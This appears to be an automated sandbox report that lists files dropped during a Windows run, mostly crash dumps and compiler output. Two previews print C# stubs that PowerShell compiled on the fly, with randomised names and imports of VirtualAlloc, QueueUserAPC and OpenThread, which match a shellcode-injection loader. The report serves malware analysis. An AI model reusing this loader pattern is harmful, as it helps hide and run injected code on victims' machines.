                                SHA-512:D100B85B0237B4D327966B3F7B19E55FBAC7ABBA83C6C7D1262EF07F68D10B8E5D9B1E08B25C9EA5A31875E220DA022555AA87F0C4AB4126213DBAC6BA620449
                                Malicious:false
                                Preview:MDMP....... ........+cb........................4...........$................)..........`.......8...........T........... ...V............................................................................................U...........B..............GenuineIntelW...........T............+cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8356
                                Entropy (8bit):3.6933010429084745
                                Encrypted:false
                                SSDEEP:192:Rrl7r3GLNitC66q06YpoSU5zgmflSQCpNP89b571fHTm:RrlsNio686YWSU5zgmflSu5Jfq
                                MD5:0DB5E90F9A50EBD43F3DF77C0DA85950
                                SHA1:B4EB81ABFEDA2C5FCF0A3F8D04F78B19BFB1BF70
                                SHA-256:833B8C530A023BD671DDD8012AA17D0C0F15F255008D3C946443CCE66ADC0BFF
                                SHA-512:3839036F675F9945C835F7E058C20ECF6191E7FC1A654899335ED4B3FC8D081556890C5509E7EFF953E743CA2975C1019517564FB3F9EE36432A362698E287C5
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4665
                                Entropy (8bit):4.431687079649683
                                Encrypted:false
                                SSDEEP:48:cvIwSD8zsIJgtWI92gWgc8sqYjhq8fm8M4J2+AFpdW+q8vQ+CKcQIcQw0ld:uITfOxZgrsqY1fJBKmKkw0ld
                                MD5:1DBFF782298A0B63A1CC9CDF1DF61976
                                SHA1:3024D4229EEE1DFBB8E000183F6CDFAC66732407
                                SHA-256:6BC464DB5E86A06C79A21B34035437175F2C1D128EE0DCE7DC01D45E2E1CD1D8
                                SHA-512:EF28376A35433F6278CA36321C4DA9F000AAC8DAB3BD9EA7A829D1B65F81BCCD88528442B9CDAD2EE707C5B2E44FF663A62C4BB249417C1686E9B1BC276F0FE4
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 22 22:26:50 2022, 0x1205a4 type
                                Category:dropped
                                Size (bytes):41134
                                Entropy (8bit):1.975058856907694
                                Encrypted:false
                                SSDEEP:192:+5mcXsADYmaM3IdOGKWhi075TTxZ6Tpdy2FjrFJDq:evshcGtQ075TH6Tpvq
                                MD5:2001588067FFF81F56C55A45CFC8D00C
                                SHA1:FCC83C72DF6A50E9E5A0B2EE60D4AF17CAFF3F79
                                SHA-256:6F54FE4171D5D68F0FBDCC4AAE1C49EA13E04D8A592EDDE299D97232536071EB
                                SHA-512:4F7C5711FC707A734BEE855473D6EABFEB555166F537BBEBFBDB7503BF8844E38A589AAE5BE29C9769DDD9181252F807FEEA58C56E5410AEF18287576118DE24
                                Malicious:false
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8340
                                Entropy (8bit):3.69963560991601
                                Encrypted:false
                                SSDEEP:192:Rrl7r3GLNit06nfq06YprSUYWgmfcSQCprk89bFzsfsXm:RrlsNie6x6YFSUYWgmfcSZFYfB
                                MD5:516269548DB5CE174DADC69DEBA1EB5C
                                SHA1:11FAF3721AA9894B5591B1BCE04F5F72D2DC8DE4
                                SHA-256:E9EF7AB53DF211C4A0A1D12C6E5A073BF1F9702B1A6EBE440E9C23BCA2565AC6
                                SHA-512:2139A4ED0CB86BAACA05655D9D074F36C99E7F75B523FDC9CFAE55742F13958D2D3E34A44D1FDF05764FA21ECCC19F08AAD006CC13DCBA4592C987D8E0E52604
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4598
                                Entropy (8bit):4.471806474905488
                                Encrypted:false
                                SSDEEP:48:cvIwSD8zsIJgtWI92gWgc8sqYjhF8fm8M4J2+hZFRb+q849krKcQIcQw0kd:uITfOxZgrsqY1yJbdbarKkw0kd
                                MD5:DED0973B6E25A0EFCBA8347616282B2D
                                SHA1:488F0BA05EEBD3FD6F3234A170074152C02906B3
                                SHA-256:358350ADB96A3F7620569B6C9551773225FC09060ED4C99FFC5F3E2BC6FF9AC3
                                SHA-512:2103F5C5D1021053BB37E577665D57B4961B33881BBC084F2E881C358AEF87395A55FCDE151E785922BE39066AE97A0A5E29EEC3B9BFF88F9F2A5127972B76A5
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 22 22:26:59 2022, 0x1205a4 type
                                Category:dropped
                                Size (bytes):54158
                                Entropy (8bit):2.188437702004145
                                Encrypted:false
                                SSDEEP:192:v5FcMhsADYmaNnOGKWSV+hHTpg0DAKwZhbvB5isF7h75TT+nZPnnTlODfE9zsQ:xxsh4GtjhjAKwZhbziwV75TaZPnhsQ
                                MD5:8C90697300310A9955BFECD8FBE19128
                                SHA1:89ECCBCAF68529209F03D80BB216F6AB2E42020D
                                SHA-256:B47100BC6B1B609C64B3ACE915F911B109B86CE453B7A16B0884763B01B5ADB8
                                SHA-512:AAEFEB710D9ACD68122BD0844F854B9B77E00618ED321759257D2228C7F648D9065E131F4259E3D78F9B4604A7B8A0F5D0AF50615F45747E1BC68045E50655AB
                                Malicious:false
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8294
                                Entropy (8bit):3.696774268699421
                                Encrypted:false
                                SSDEEP:192:Rrl7r3GLNitQ67q06YpbSUGmgmfqSJ7CpD989bFLzsf8fzm:RrlsNia616Y1SUGmgmfqSJxFLYfMq
                                MD5:62B8619A4E1DEEB3CFE96784DC7BCE24
                                SHA1:7B61FB3B1F695606412A6DA9E26671521D321E0D
                                SHA-256:A5988942CA222FF850B4FFBEA7BE18868602C422ABFCA475C81EBAAC33718685
                                SHA-512:AA5091E3E6A2D713E1D0C0473B38220990ED51190061251FE44C791EF70FA8189FEF2F119990E92C5B49CC59F0138587FBD48A22D4A21AD8B48A99BABEDD6D7D
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4564
                                Entropy (8bit):4.4450578324351975
                                Encrypted:false
                                SSDEEP:48:cvIwSD8zsIJgtWI92gWgc8sqYjhj8fm8M4J2+bF4+q84CPKcQIcQw0kd:uITfOxZgrsqY1gJocKkw0kd
                                MD5:94F0237F61D6A72BF9FD262D5DAF1CB8
                                SHA1:77BA53C28A3D168D892F2D06300803EC5CF62C34
                                SHA-256:0A82D2F9FA529CEBB573FD7A8D54A1EE0C689179A013A2B1AA5C3F6E7F333A79
                                SHA-512:D3F0BD47566C109A1DC34A0128DDBD00B4C61C99A3DAD26A29CD182AACA889854305F960FF503BCA681E097273D18372BCE4D380B2F3ED718C0AAFD1D207EBE5
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11606
                                Entropy (8bit):4.883977562702998
                                Encrypted:false
                                SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                                MD5:243581397F734487BD471C04FB57EA44
                                SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                                SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                                SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                                Malicious:false
                                Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.9260988789684415
                                Encrypted:false
                                SSDEEP:3:Nlllulb/lj:NllUb/l
                                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                Malicious:false
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                Category:modified
                                Size (bytes):1336
                                Entropy (8bit):4.0070959147380645
                                Encrypted:false
                                SSDEEP:24:HJm9ZLo1c8ZH+hKdNwI+ycuZhNwakScPNnq9Sd:uSrZ0Kdm1ulwa3Mq9C
                                MD5:0207AEB635BFA2BFB793AA26D45D28BC
                                SHA1:EFC69E173AB42B6B1AF939C8BE54DC73301AC851
                                SHA-256:C94D40766F2B91F22AD5E55BA35D947AE2825F5B9A34E0ECE134B0A86ECCE5AF
                                SHA-512:B11F2E0DFE55984263E6BA60EE1B95E6D07588F64435CD4EF2D972A41819E37AB5DCBE268671C67D7D4ADDC6EEF99FC31CE1162BFAD35D68B71E8F3400B45777
                                Malicious:false
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                Category:modified
                                Size (bytes):1336
                                Entropy (8bit):4.01926801632089
                                Encrypted:false
                                SSDEEP:24:Hbm9ZM+IZHUhKdNwI+ycuZhNUsvakSfsIPNnq9Sd:QeZGKdm1ul/a3jq9C
                                MD5:79C2F50A254E8807286FA0F3634DCDAA
                                SHA1:3ED67CB1DE55A3B1B93CBD8510385B9608F4F624
                                SHA-256:983C6748597DC864F47D16C32EAAA59C226FBE8DF3ADCC37C48640A59BAD0C93
                                SHA-512:7AE7FA180A5A95550FD00DA6B9AF07FD777251B713683B66512C6DE624BB823C9B6D0A99DF8678A9006EE87B8C9244C974B945D135FA1433384649AB175836CF
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.087313141948283
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWlklqqak7YnqqFlklqbPN5Dlq5J:+RI+ycuZhNUsvakSfsIPNnqX
                                MD5:3D9C89F9813A7154E8FB79DA7D10E8B2
                                SHA1:4E2EA7F78C62941F644D9F1FAD64D127E31306CE
                                SHA-256:B76B5C81AFE17B214527AC8DCD85285CED0102DC6164A4304188B5D4D4E69239
                                SHA-512:72123D606437DA61F2D52D44E329F6CD0E9CB6CD86A3739436F54889D0972FBA14EFB814D244B2A2CEBA34730E6B2C15226A5403BE8C0F7886D396A3021FCA9F
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text
                                Category:dropped
                                Size (bytes):417
                                Entropy (8bit):5.038440975503667
                                Encrypted:false
                                SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                                MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                                SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                                SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                                SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                                Malicious:false
                                Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):377
                                Entropy (8bit):5.245551465598388
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fQ+b0zxs7+AEszIcNwi23fQ+CWH:p37Lvkmb6KwZ4+wWZEJZ4+VH
                                MD5:657DF5DBF2CD40C8427224A737044E8C
                                SHA1:9BB8F1884A4BF325B5E07D3874D7CB7CD163A047
                                SHA-256:47A5E44ED29C7B102C323480B9BFB1992012E17C84BD7C5A601E3AADC9690BCA
                                SHA-512:60404977E8335B653914ADE5B6B9506714E2855F31A4F9E046898D7A66480CAC4631D851061911B309E6AFBF0EBFA8539D1417E00861D8F25C21AF6AF6E4FDFF
                                Malicious:false
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.0.cs"
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3584
                                Entropy (8bit):2.643829505456859
                                Encrypted:false
                                SSDEEP:24:etGSDeMWWOJy853Ek0s2E7Og1odWQzbtkZfdFwT/OWI+ycuZhNUsvakSfsIPNnq:6svz5UkGE7vsWQzqJ/a11ul/a3jq
                                MD5:010A7FEF0AA253BE01A7D57105104C99
                                SHA1:EC3146FF9E8A4218C2D14CE70863692B953A751E
                                SHA-256:B291831CDE532E047D0BBDB58CEFA9AAF938BEFE3F2FDF3762F7F7387A134DD5
                                SHA-512:C5B8B280D4D696424FBB02582992513EFA5186E4DCBABB2E2057439178330A8857A0DF3172F054FC8CB94966182FAFA6F813A979871E3A8E44FB21350D4268D5
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):874
                                Entropy (8bit):5.323639412262709
                                Encrypted:false
                                SSDEEP:24:AId3ka6KgvEvbOKaM5DqBVKVrdFAMBJTH:Akka67vEvCKxDcVKdBJj
                                MD5:77A926519D8FA89DF6F5D0C77E79D0A3
                                SHA1:7912DA6B9435D7AF26FA649341CB5E0124EA8FC3
                                SHA-256:452BD2C2631FDB744B80E6DD5A033C45548FE8733869C2F9F41110A529F1F9B0
                                SHA-512:40D9D3C5443AD37475C6F9A3B5E1E4C784B44AA664DE62EA10A0B6011657DFF2A2AA5B9846B58B1A75277E747406A42BB7DDCD99A67ECB23FDB82D1CBB225BBA
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.1048977846809547
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMbak7Ynqq/UPN5Dlq5J:+RI+ycuZhNwakScPNnqX
                                MD5:E2051F8A521B2F3B00C715BD57DCCC78
                                SHA1:667FC3B5ED67494166B61D57050519DA3C24C9EC
                                SHA-256:9FC45C88A9D75B6A1856480057CACF18B668C8C61992A417C1FB48EB0C4381F1
                                SHA-512:9C0585D9186601C0497179607893F845DABBFFFB8BE8453162BD9435CB1F6F9030CE01F1A16ADE1E79FBC01DF4B16CD3913EB4A39DA0F391CC0B06D92A8A1F89
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text
                                Category:dropped
                                Size (bytes):411
                                Entropy (8bit):5.082169696837192
                                Encrypted:false
                                SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                                MD5:248E15CD19191D4333303E0E1F8E9A70
                                SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                                SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                                SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                                Malicious:false
                                 Preview:
                                 using System;
                                 using System.Runtime.InteropServices;

                                 namespace W32
                                 {
                                     public class yifpgxqqbj
                                     {
                                         [DllImport("kernel32")]
                                         public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);
                                         [DllImport("kernel32")]
                                         public static extern IntPtr GetCurrentThreadId();
                                         [DllImport("kernel32")]
                                         public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);
                                     }
                                 }
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):377
                                Entropy (8bit):5.2338402577992165
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fDSZ++zxs7+AEszIcNwi23fDSZE:p37Lvkmb6KwZLYWZEJZLV
                                MD5:23922C7400B5639004534C21A8FC6FD9
                                SHA1:EFC910B97F452FB59BF063CB331136BF7B5EE364
                                SHA-256:65423661DBE57376B2BFEE4E014394645B6A2C67FC8C71C9F9196D586FBBAE09
